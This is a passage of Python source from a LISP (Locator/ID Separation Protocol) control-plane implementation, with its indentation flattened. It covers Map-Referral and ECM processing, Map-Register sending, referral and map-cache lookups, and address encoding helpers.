referral = lisp_referral_cache_lookup(eid_record.eid, eid_record.group,
True)
if (referral == None):
add_or_replace = True
referral = lisp_referral()
referral.eid = eid_record.eid
referral.group = eid_record.group
if (eid_record.ddt_incomplete == False): referral.add_cache()
elif (referral.referral_source.not_set()):
lprint("Do not replace static referral entry {}".format( \
green(referral.print_eid_tuple(), False)))
mr.dequeue_map_request()
continue
#endif
action = eid_record.action
referral.referral_source = source
referral.referral_type = action
ttl = eid_record.store_ttl()
referral.referral_ttl = ttl
referral.expires = lisp_set_timestamp(ttl)
#
# Mark locator up if the Map-Referral source is in the referral-set.
#
negative = referral.is_referral_negative()
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
if (ref_node.updown == False and negative == False):
ref_node.updown = True
lprint("Change up/down status for referral-node {} to up". \
format(s))
elif (ref_node.updown == True and negative == True):
ref_node.updown = False
lprint(("Change up/down status for referral-node {} " + \
"to down, received negative referral").format(s))
#endif
#endif
#
# Set dirty-bit so we can remove referral-nodes from cached entry
        # that weren't in the packet.
#
dirty_set = {}
for key in referral.referral_set: dirty_set[key] = None
#
# Process each referral RLOC-record in EID record.
#
for i in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Referral packet")
return
#endif
rloc_record.print_record(" ")
#
# Copy over existing referral-node
#
addr_str = rloc_record.rloc.print_address()
if (referral.referral_set.has_key(addr_str) == False):
ref_node = lisp_referral_node()
ref_node.referral_address.copy_address(rloc_record.rloc)
referral.referral_set[addr_str] = ref_node
if (s == addr_str and negative): ref_node.updown = False
else:
ref_node = referral.referral_set[addr_str]
if (dirty_set.has_key(addr_str)): dirty_set.pop(addr_str)
#endif
ref_node.priority = rloc_record.priority
ref_node.weight = rloc_record.weight
#endfor
#
# Now remove dirty referral-node entries.
#
for key in dirty_set: referral.referral_set.pop(key)
eid_str = referral.print_eid_tuple()
if (add_or_replace):
if (eid_record.ddt_incomplete):
lprint("Suppress add {} to referral-cache".format( \
green(eid_str, False)))
else:
lprint("Add {}, referral-count {} to referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
else:
lprint("Replace {}, referral-count: {} in referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
#
# Process actions.
#
if (action == LISP_DDT_ACTION_DELEGATION_HOLE):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
if (action == LISP_DDT_ACTION_NOT_AUTH):
if (mr.tried_root):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 0, None, False)
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, True)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG):
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
ref_node.updown = False
#endif
if (len(referral.referral_set) == 0):
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)):
if (mr.eid.is_exact_match(eid_record.eid)):
if (not mr.tried_root):
lisp_send_ddt_map_request(mr, True)
else:
lisp_send_negative_map_reply(mr.lisp_sockets,
referral.eid, referral.group, mr.nonce, mr.itr,
mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_ACK): mr.dequeue_map_request()
#endfor
return
#enddef
#
# lisp_process_ecm
#
# Process a received Encapsulated-Control-Message. It is assumed for right now
# that all ECMs have a Map-Request embedded.
#
def lisp_process_ecm(lisp_sockets, packet, source, ecm_port):
ecm = lisp_ecm(0)
packet = ecm.decode(packet)
if (packet == None):
lprint("Could not decode ECM packet")
return
#endif
ecm.print_ecm()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return
#endif
packet_type = header.type
del(header)
if (packet_type != LISP_MAP_REQUEST):
lprint("Received ECM without Map-Request inside")
return
#endif
#
# Process Map-Request.
#
mr_port = ecm.udp_sport
lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
ecm.source, mr_port, ecm.ddt, -1)
return
#enddef
#------------------------------------------------------------------------------
#
# lisp_send_map_register
#
# Compute authentication for the Map-Register message and send it to the
# supplied Map-Server.
# Map-Server.
#
def lisp_send_map_register(lisp_sockets, packet, map_register, ms):
#
# If we are doing LISP-Decent and have a multicast group configured as
    # a Map-Server, we can't join the group by sending to the group itself,
    # so we have to send to the loopback address to bootstrap our membership.
    # We join via one other member of the peer-group so we can learn the
    # group membership.
#
dest = ms.map_server
if (lisp_decent_push_configured and dest.is_multicast_address() and
(ms.map_registers_multicast_sent == 1 or ms.map_registers_sent == 1)):
dest = copy.deepcopy(dest)
dest.address = 0x7f000001
b = bold("Bootstrap", False)
g = ms.map_server.print_address_no_iid()
lprint("{} mapping system for peer-group {}".format(b, g))
#endif
#
# Modify authentication hash in Map-Register message if supplied when
# lisp_map_register() was called.
#
packet = lisp_compute_auth(packet, map_register, ms.password)
#
# Should we encrypt the Map-Register? Use 16-byte key which is
# 32 string characters.
#
if (ms.ekey != None):
ekey = ms.ekey.zfill(32)
iv = "0" * 8
ciphertext = chacha.ChaCha(ekey, iv).encrypt(packet[4::])
packet = packet[0:4] + ciphertext
e = bold("Encrypt", False)
lprint("{} Map-Register with key-id {}".format(e, ms.ekey_id))
#endif
decent = ""
if (lisp_decent_pull_xtr_configured()):
decent = ", decent-index {}".format(bold(ms.dns_name, False))
#endif
lprint("Send Map-Register to map-server {}{}{}".format( \
dest.print_address(), ", ms-name '{}'".format(ms.ms_name), decent))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_ipc_to_core
#
# Send LISP control packet that is to be sourced from UDP port 4342 to the
# lisp-core process.
#
def lisp_send_ipc_to_core(lisp_socket, packet, dest, port):
source = lisp_socket.getsockname()
dest = dest.print_address_no_iid()
lprint("Send IPC {} bytes to {} {}, control-packet: {}".format( \
len(packet), dest, port, lisp_format_packet(packet)))
packet = lisp_control_packet_ipc(packet, source, dest, port)
lisp_ipc(packet, lisp_socket, "lisp-core-pkt")
return
#enddef
#
# lisp_send_map_reply
#
# Send Map-Reply message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_reply(lisp_sockets, packet, dest, port):
lprint("Send Map-Reply to {}".format(dest.print_address_no_iid()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_referral
#
# Send Map-Referral message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_referral(lisp_sockets, packet, dest, port):
lprint("Send Map-Referral to {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_notify
#
# Send Map-Notify message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_notify(lisp_sockets, packet, dest, port):
lprint("Send Map-Notify to xTR {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_ecm
#
# Send Encapsulated Control Message.
#
def lisp_send_ecm(lisp_sockets, packet, inner_source, inner_sport, inner_dest,
outer_dest, to_etr=False, to_ms=False, ddt=False):
if (inner_source == None or inner_source.is_null()):
inner_source = inner_dest
#endif
#
    # For sending Map-Requests, if NAT-traversal is configured, use the same
# socket used to send the Info-Request.
#
if (lisp_nat_traversal):
sport = lisp_get_any_translated_port()
if (sport != None): inner_sport = sport
#endif
ecm = lisp_ecm(inner_sport)
ecm.to_etr = to_etr if lisp_is_running("lisp-etr") else False
ecm.to_ms = to_ms if lisp_is_running("lisp-ms") else False
ecm.ddt = ddt
ecm_packet = ecm.encode(packet, inner_source, inner_dest)
if (ecm_packet == None):
lprint("Could not encode ECM message")
return
#endif
ecm.print_ecm()
packet = ecm_packet + packet
addr_str = outer_dest.print_address_no_iid()
lprint("Send Encapsulated-Control-Message to {}".format(addr_str))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#------------------------------------------------------------------------------
#
# Below are constant definitions used for internal data structures.
#
LISP_AFI_GEO_COORD = -3
LISP_AFI_IID_RANGE = -2
LISP_AFI_ULTIMATE_ROOT = -1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
#------------------------------------------------------------------------------
#
# This is a general address format for EIDs, RLOCs, EID-prefixes in any AFI or
# LCAF format.
#
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
#
# byte_swap_64
#
# Byte-swap a 64-bit number.
#
def byte_swap_64(address):
addr = \
((address & 0x00000000000000ff) << 56) | \
((address & 0x000000000000ff00) << 40) | \
((address & 0x0000000000ff0000) << 24) | \
((address & 0x00000000ff000000) << 8) | \
((address & 0x000000ff00000000) >> 8) | \
((address & 0x0000ff0000000000) >> 24) | \
((address & 0x00ff000000000000) >> 40) | \
((address & 0xff00000000000000) >> 56)
return(addr)
#enddef
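#
# Illustrative example (editor's sketch, not called by any code): the swap
# above reverses the byte order of a 64-bit value, e.g.:
#
#   byte_swap_64(0x0102030405060708) == 0x0807060504030201
#
# It is used to move each 64-bit half of an IPv6 address between host and
# network byte order.
#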
#
# lisp_cache is a data structure to implement a multi-way tree. The first
# level array is an associative array of mask-lengths. Then each mask-length
# entry will be an associatative array of the following key:
#
# <32-bit-instance-id> <16-bit-address-family> <eid-prefix>
#
# Data structure:
# self.cache{}
# self.cache_sorted[]
# self.cache{}.entries{}
# self.cache{}.entries_sorted[]
#
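# Worked example (editor's sketch, assuming lisp_hex_string() returns hex
# digits without a "0x" prefix): for EID-prefix [1000]10.0.0.0/8,
# lisp_cache.build_key() computes:
#
#   ml  = 8 + 48 = 56
#   key = "000003e8" + "0001" + "0a000000"
#         (instance-id 1000)   (AFI 1)  (address 10.0.0.0)
#
# Entries are grouped by mask-length first and then sorted by this
# concatenated instance-id/AFI/address string.
#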
class lisp_cache_entries():
def __init__(self):
self.entries = {}
self.entries_sorted = []
#enddef
#endclass
class lisp_cache():
def __init__(self):
self.cache = {}
self.cache_sorted = []
self.cache_count = 0
#enddef
def cache_size(self):
return(self.cache_count)
#enddef
def build_key(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
ml = 0
elif (prefix.afi == LISP_AFI_IID_RANGE):
ml = prefix.mask_len
else:
ml = prefix.mask_len + 48
#endif
iid = lisp_hex_string(prefix.instance_id).zfill(8)
afi = lisp_hex_string(prefix.afi).zfill(4)
if (prefix.afi > 0):
if (prefix.is_binary()):
length = prefix.addr_length() * 2
addr = lisp_hex_string(prefix.address).zfill(length)
else:
addr = prefix.address
#endif
elif (prefix.afi == LISP_AFI_GEO_COORD):
afi = "8003"
addr = prefix.address.print_geo()
else:
afi = ""
addr = ""
#endif
key = iid + afi + addr
return([ml, key])
#enddef
def add_cache(self, prefix, entry):
if (prefix.is_binary()): prefix.zero_host_bits()
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False):
self.cache[ml] = lisp_cache_entries()
self.cache[ml].entries = {}
self.cache[ml].entries_sorted = []
self.cache_sorted = sorted(self.cache)
#endif
if (self.cache[ml].entries.has_key(key) == False):
self.cache_count += 1
#endif
self.cache[ml].entries[key] = entry
self.cache[ml].entries_sorted = sorted(self.cache[ml].entries)
#enddef
def lookup_cache(self, prefix, exact):
ml_key, key = self.build_key(prefix)
if (exact):
if (self.cache.has_key(ml_key) == False): return(None)
if (self.cache[ml_key].entries.has_key(key) == False): return(None)
return(self.cache[ml_key].entries[key])
#endif
found = None
for ml in self.cache_sorted:
if (ml_key < ml): return(found)
for entry_key in self.cache[ml].entries_sorted:
entries = self.cache[ml].entries
if (entry_key in entries):
entry = entries[entry_key]
if (entry == None): continue
if (prefix.is_more_specific(entry.eid)): found = entry
#endif
#endfor
#endfor
return(found)
#enddef
def delete_cache(self, prefix):
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False): return
if (self.cache[ml].entries.has_key(key) == False): return
self.cache[ml].entries.pop(key)
self.cache[ml].entries_sorted.remove(key)
self.cache_count -= 1
#enddef
def walk_cache(self, function, parms):
for ml in self.cache_sorted:
for key in self.cache[ml].entries_sorted:
entry = self.cache[ml].entries[key]
status, parms = function(entry, parms)
if (status == False): return(parms)
#endfor
#endfor
return(parms)
#enddef
def print_cache(self):
lprint("Printing contents of {}: ".format(self))
if (self.cache_size() == 0):
lprint(" Cache is empty")
return
#endif
for ml in self.cache_sorted:
for key in self.cache[ml].entries_sorted:
entry = self.cache[ml].entries[key]
lprint(" Mask-length: {}, key: {}, entry: {}".format(ml, key,
entry))
#endfor
#endfor
#enddef
#endclass
#
# Caches.
#
lisp_referral_cache = lisp_cache()
lisp_ddt_cache = lisp_cache()
lisp_sites_by_eid = lisp_cache()
lisp_map_cache = lisp_cache()
lisp_db_for_lookups = lisp_cache() # Elements are class lisp_mapping()
#
# lisp_map_cache_lookup
#
# Do hierarchical lookup in the lisp_map_cache lisp_cache(). This is used
# by the ITR and RTR data-planes.
#
def lisp_map_cache_lookup(source, dest):
multicast = dest.is_multicast_address()
#
# Look up destination in map-cache.
#
mc = lisp_map_cache.lookup_cache(dest, False)
if (mc == None):
eid_str = source.print_sg(dest) if multicast else dest.print_address()
eid_str = green(eid_str, False)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Unicast lookup succeeded.
#
if (multicast == False):
m = green(mc.eid.print_prefix(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(dest.print_address(), False), m))
return(mc)
#endif
#
# If destination is multicast, then do source lookup.
#
mc = mc.lookup_source_cache(source, False)
if (mc == None):
eid_str = source.print_sg(dest)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Multicast lookup succeeded.
#
m = green(mc.print_eid_tuple(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(source.print_sg(dest), False), m))
return(mc)
#enddef
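#
# Usage sketch (editor's note): a data-plane caller would typically do
# something like the following, where both arguments are lisp_address()
# objects taken from the packet being forwarded:
#
#   mc = lisp_map_cache_lookup(inner_source, inner_dest)
#   if (mc != None): forward using mc.rloc_set
#
# For unicast destinations only the destination lookup runs; for multicast
# destinations a second lookup on the source selects the (S,G) entry.
#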
#
# lisp_referral_cache_lookup
#
# Do hierarchical lookup in the lisp_referral_cache lisp_cache().
#
def lisp_referral_cache_lookup(eid, group, exact):
if (group and group.is_null()):
ref = lisp_referral_cache.lookup_cache(eid, exact)
return(ref)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid == None or eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ref = lisp_referral_cache.lookup_cache(group, exact)
if (ref == None): return(None)
sref = ref.lookup_source_cache(eid, exact)
if (sref): return(sref)
if (exact): ref = None
return(ref)
#enddef
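#
# Example (editor's sketch): for an (S,G) lookup such as
# ([1000]10.1.1.1/32, [1000]224.1.1.1/32), the group is looked up first and
# the source is then looked up inside the group entry with
# lookup_source_cache(). On a longest-match lookup the group entry is
# returned when no source entry exists; on an exact-match lookup None is
# returned instead.
#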
#
# lisp_ddt_cache_lookup
#
# Do hierarchical lookup in the lisp_ddt_cache lisp_cache().
#
def lisp_ddt_cache_lookup(eid, group, exact):
if (group.is_null()):
ddt = lisp_ddt_cache.lookup_cache(eid, exact)
return(ddt)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ddt = lisp_ddt_cache.lookup_cache(group, exact)
if (ddt == None): return(None)
sddt = ddt.lookup_source_cache(eid, exact)
if (sddt): return(sddt)
if (exact): ddt = None
return(ddt)
#enddef
#
# lisp_site_eid_lookup
#
# Do hierarchical lookup in the lisp_sites_by_eid lisp_cache().
#
def lisp_site_eid_lookup(eid, group, exact):
if (group.is_null()):
site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
return(site_eid)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
if (site_eid == None): return(None)
#
# There is a special case we have to deal with here. If there exists a
# (0.0.0.0/0, 224.0.0.0/4) entry that has been configured with accept-
    # more-specifics, this entry will not be returned if there is a more-
# specific already cached. For instance, if a Map-Register was received
# for (1.1.1.1/32, 224.1.1.1/32), it will match the (0.0.0.0/0,
# 224.0.0.0/4) entry. But when (1.1.1.1/32, 224.1.1.1/32) is cached and
# a Map-Register is received for (2.2.2.2/32, 224.1.1.1/32), rather than
# matching the ams entry, it will match the more specific entry and return
# (*, 224.1.1.1/32). Since the source lookup will be performed below and
    # not find 2.2.2.2, what is returned is 224.1.1.1/32 and not 224.0.0.0/4.
#
    # So we will look at the returned entry and if a source is not found, we
# will check to see if the parent of the 224.1.1.1/32 matches the group
# we are looking up. This, of course, is only done for longest match
# lookups.
#
seid = site_eid.lookup_source_cache(eid, exact)
if (seid): return(seid)
if (exact):
site_eid = None
else:
parent = site_eid.parent_for_more_specifics
if (parent and parent.accept_more_specifics):
if (group.is_more_specific(parent.group)): site_eid = parent
#endif
#endif
return(site_eid)
#enddef
#
# LISP Address encodings. Both in AFI formats and LCAF formats.
#
# Here is an EID encoded in:
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# There is a python peculiarity with shifting greater than 120 bits to the
# left. If the high-order bit hits bit 127, then it shifts it another 8 bits.
# This causes IPv6 addresses to lose their high-order byte. So note the check
# for shift >= 120 below.
#
class lisp_address():
def __init__(self, afi, addr_str, mask_len, iid):
self.afi = afi
self.mask_len = mask_len
self.instance_id = iid
self.iid_list = []
self.address = 0
if (addr_str != ""): self.store_address(addr_str)
#enddef
def copy_address(self, addr):
if (addr == None): return
self.afi = addr.afi
self.address = addr.address
self.mask_len = addr.mask_len
self.instance_id = addr.instance_id
self.iid_list = addr.iid_list
#enddef
def make_default_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
self.mask_len = 0
self.address = 0
#enddef
def make_default_multicast_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
if (self.afi == LISP_AFI_IPV4):
self.address = 0xe0000000
self.mask_len = 4
#endif
if (self.afi == LISP_AFI_IPV6):
self.address = 0xff << 120
self.mask_len = 8
#endif
if (self.afi == LISP_AFI_MAC):
self.address = 0xffffffffffff
self.mask_len = 48
#endif
#enddef
def not_set(self):
return(self.afi == LISP_AFI_NONE)
#enddef
def is_private_address(self):
if (self.is_ipv4() == False): return(False)
addr = self.address
if (((addr & 0xff000000) >> 24) == 10): return(True)
if (((addr & 0xff000000) >> 24) == 172):
byte2 = (addr & 0x00ff0000) >> 16
if (byte2 >= 16 and byte2 <= 31): return(True)
#endif
if (((addr & 0xffff0000) >> 16) == 0xc0a8): return(True)
return(False)
#enddef
def is_multicast_address(self):
if (self.is_ipv4()): return(self.is_ipv4_multicast())
if (self.is_ipv6()): return(self.is_ipv6_multicast())
if (self.is_mac()): return(self.is_mac_multicast())
return(False)
#enddef
def host_mask_len(self):
if (self.afi == LISP_AFI_IPV4): return(LISP_IPV4_HOST_MASK_LEN)
if (self.afi == LISP_AFI_IPV6): return(LISP_IPV6_HOST_MASK_LEN)
if (self.afi == LISP_AFI_MAC): return(LISP_MAC_HOST_MASK_LEN)
if (self.afi == LISP_AFI_E164): return(LISP_E164_HOST_MASK_LEN)
if (self.afi == LISP_AFI_NAME): return(len(self.address) * 8)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()) * 8)
#endif
return(0)
#enddef
def is_iana_eid(self):
if (self.is_ipv6() == False): return(False)
addr = self.address >> 96
return(addr == 0x20010005)
#enddef
def addr_length(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(16)
if (self.afi == LISP_AFI_MAC): return(6)
if (self.afi == LISP_AFI_E164): return(8)
if (self.afi == LISP_AFI_LCAF): return(0)
if (self.afi == LISP_AFI_NAME): return(len(self.address) + 1)
if (self.afi == LISP_AFI_IID_RANGE): return(4)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()))
#endif
return(0)
#enddef
def afi_to_version(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(6)
return(0)
#enddef
def packet_format(self):
#
# Note that "I" is used to produce 4 bytes because when "L" is used,
# it was producing 8 bytes in struct.pack().
#
if (self.afi == LISP_AFI_IPV4): return("I")
if (self.afi == LISP_AFI_IPV6): return("QQ")
if (self.afi == LISP_AFI_MAC): return("HHH")
if (self.afi == LISP_AFI_E164): return("II")
if (self.afi == LISP_AFI_LCAF): return("I")
return("")
#enddef
def pack_address(self):
packet_format = self.packet_format()
packet = ""
if (self.is_ipv4()):
packet = struct.pack(packet_format, socket.htonl(self.address))
elif (self.is_ipv6()):
addr1 = byte_swap_64(self.address >> 64)
addr2 = byte_swap_64(self.address & 0xffffffffffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_mac()):
addr = self.address
addr1 = (addr >> 32) & 0xffff
addr2 = (addr >> 16) & 0xffff
addr3 = addr & 0xffff
packet = struct.pack(packet_format, addr1, addr2, addr3)
elif (self.is_e164()):
addr = self.address
addr1 = (addr >> 32) & 0xffffffff
addr2 = (addr & 0xffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_dist_name()):
packet += self.address + "\0"
#endif
return(packet)
#enddef
def unpack_address(self, packet):
packet_format = self.packet_format()
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
addr = struct.unpack(packet_format, packet[:format_size])
if (self.is_ipv4()):
self.address = socket.ntohl(addr[0])
elif (self.is_ipv6()):
#
# Sigh, we have a high-order byte with zero-fill issue when
# parsing a binary IPv6 address from a packet. If we have an
# address that starts with fe::, then addr[0] is one byte in
# length and byte-swapping is not necessary (or we would make
# the high-order 16 bits 00fe). Sigh.
#
if (addr[0] <= 0xffff and (addr[0] & 0xff) == 0):
high = (addr[0] << 48) << 64
else:
high = byte_swap_64(addr[0]) << 64
#endif
low = byte_swap_64(addr[1])
self.address = high | low
elif (self.is_mac()):
short1 = addr[0]
short2 = addr[1]
short3 = addr[2]
self.address = (short1 << 32) + (short2 << 16) + short3
elif (self.is_e164()):
self.address = (addr[0] << 32) + addr[1]
elif (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
format_size = 0
#endif
packet = packet[format_size::]
return(packet)
#enddef
def is_ipv4(self):
return(True if (self.afi == LISP_AFI_IPV4) else False)
#enddef
def is_ipv4_link_local(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 16) & 0xffff) == 0xa9fe)
#enddef
def is_ipv4_loopback(self):
if (self.is_ipv4() == False): return(False)
return(self.address == 0x7f000001)
#enddef
def is_ipv4_multicast(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 24) & 0xf0) == 0xe0)
#enddef
def is_ipv4_string(self, addr_str):
return(addr_str.find(".") != -1)
#enddef
def is_ipv6(self):
return(True if (self.afi == LISP_AFI_IPV6) else False)
#enddef
def is_ipv6_link_local(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 112) & 0xffff) == 0xfe80)
#enddef
def is_ipv6_string_link_local(self, addr_str):
return(addr_str.find("fe80::") != -1)
#enddef
def is_ipv6_loopback(self):
if (self.is_ipv6() == False): return(False)
return(self.address == 1)
#enddef
def is_ipv6_multicast(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 120) & 0xff) == 0xff)
#enddef
def is_ipv6_string(self, addr_str):
return(addr_str.find(":") != -1)
#enddef
def is_mac(self):
return(True if (self.afi == LISP_AFI_MAC) else False)
#enddef
def is_mac_multicast(self):
if (self.is_mac() == False): return(False)
return((self.address & 0x010000000000) != 0)
#enddef
def is_mac_broadcast(self):
if (self.is_mac() == False): return(False)
return(self.address == 0xffffffffffff)
#enddef
def is_mac_string(self, addr_str):
return(len(addr_str) == 15 and addr_str.find("-") != -1)
#enddef
def is_link_local_multicast(self):
if (self.is_ipv4()):
return((0xe0ffff00 & self.address) == 0xe0000000)
#endif
if (self.is_ipv6()):
return((self.address >> 112) & 0xffff == 0xff02)
#endif
return(False)
#enddef
def is_null(self):
return(True if (self.afi == LISP_AFI_NONE) else False)
#enddef
def is_ultimate_root(self):
return(True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)
#enddef
def is_iid_range(self):
return(True if self.afi == LISP_AFI_IID_RANGE else False)
#enddef
def is_e164(self):
return(True if (self.afi == LISP_AFI_E164) else False)
#enddef
def is_dist_name(self):
return(True if (self.afi == LISP_AFI_NAME) else False)
#enddef
def is_geo_prefix(self):
return(True if (self.afi == LISP_AFI_GEO_COORD) else False)
#enddef
def is_binary(self):
if (self.is_dist_name()): return(False)
if (self.is_geo_prefix()): return(False)
return(True)
#enddef
def store_address(self, addr_str):
if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)
#
# Parse instance-id.
#
i = addr_str.find("[")
j = addr_str.find("]")
if (i != -1 and j != -1):
self.instance_id = int(addr_str[i+1:j])
addr_str = addr_str[j+1::]
if (self.is_dist_name() == False):
addr_str = addr_str.replace(" ", "")
#endif
#endif
#
# Parse AFI based address.
#
if (self.is_ipv4()):
octet = addr_str.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
self.address = value
elif (self.is_ipv6()):
#
# There will be a common IPv6 address input mistake that will
# occur. The address ff::/8 (or an address ff::1) is actually
# encoded as 0x00ff as the high-order 16-bits. The correct way to
# specify the prefix is ff00::/8 but one would wonder why the
# lower order 0x00 bits are needed if a /8 is used. So to
# summarize:
#
# Entering ff::/8 will give you the 0::/8 prefix.
# Entering ff00::/8 is not the same as ff00::/16.
#
            # Allow user to specify ff::/8 which allows for placing the
# byte in the high-order byte of the 128-bit quantity. Check
# for double-colon in the input string to detect the single byte
# and then below byte-swap the first 2-bytes.
#
odd_byte = (addr_str[2:4] == "::")
try:
addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
except:
addr_str = socket.inet_pton(socket.AF_INET6, "0::0")
#endtry
addr_str = binascii.hexlify(addr_str)
if (odd_byte):
addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]
#endif
self.address = int(addr_str, 16)
elif (self.is_geo_prefix()):
geo = lisp_geo(None)
geo.name = "geo-prefix-{}".format(geo)
geo.parse_geo_string(addr_str)
self.address = geo
elif (self.is_mac()):
addr_str = addr_str.replace("-", "")
value = int(addr_str, 16)
self.address = value
elif (self.is_e164()):
addr_str = addr_str[1::]
value = int(addr_str, 16)
self.address = value << 4
elif (self.is_dist_name()):
self.address = addr_str.replace("'", "")
#endif
self.mask_len = self.host_mask_len()
#enddef
def store_prefix(self, prefix_str):
if (self.is_geo_string(prefix_str)):
index = prefix_str.find("]")
mask_len = len(prefix_str[index+1::]) * 8
elif (prefix_str.find("/") != -1):
prefix_str, mask_len = prefix_str.split("/")
else:
left = prefix_str.find("'")
if (left == -1): return
right = prefix_str.find("'", left+1)
if (right == -1): return
mask_len = len(prefix_str[left+1:right]) * 8
#endif
self.string_to_afi(prefix_str)
self.store_address(prefix_str)
self.mask_len = int(mask_len)
#enddef
def zero_host_bits(self):
mask = (2 ** self.mask_len) - 1
shift = self.addr_length() * 8 - self.mask_len
mask <<= shift
self.address &= mask
#enddef
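    #
    # Worked example (editor's sketch): for an IPv4 prefix 10.1.2.3/16,
    # zero_host_bits() computes mask = (2**16 - 1) << 16 = 0xffff0000 and
    # leaves self.address as 10.1.0.0.
    #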
